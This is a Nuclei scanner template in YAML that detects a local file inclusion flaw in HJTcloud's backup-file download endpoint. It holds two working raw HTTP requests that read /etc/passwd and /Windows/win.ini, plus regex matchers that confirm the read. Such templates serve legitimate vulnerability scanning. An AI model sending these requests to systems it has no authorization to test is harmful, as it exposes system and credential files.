48 lines
1.3 KiB
YAML
48 lines
1.3 KiB
YAML
id: hjtcloud-arbitrary-file-read
|
|
|
|
info:
|
|
name: HJTcloud - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: HJTcloud is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 2
|
|
tags: hjtcloud,lfi
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /fileDownload?action=downloadBackupFile HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json, text/plain, */*
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
fullPath=/etc/passwd
|
|
- |
|
|
POST /fileDownload?action=downloadBackupFile HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json, text/plain, */*
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
fullPath=/Windows/win.ini
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "bit app support"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022015fc8aa0cc017381974dfdc8a17b9d6f2cc930a287838ba01b510518b5618489022100f79487fdbbf4f4611f62cf912d84a35fa1ceec4ba77405e9fa30cb15339bb14b:922c64590222798bb761d5b6d8e72950
|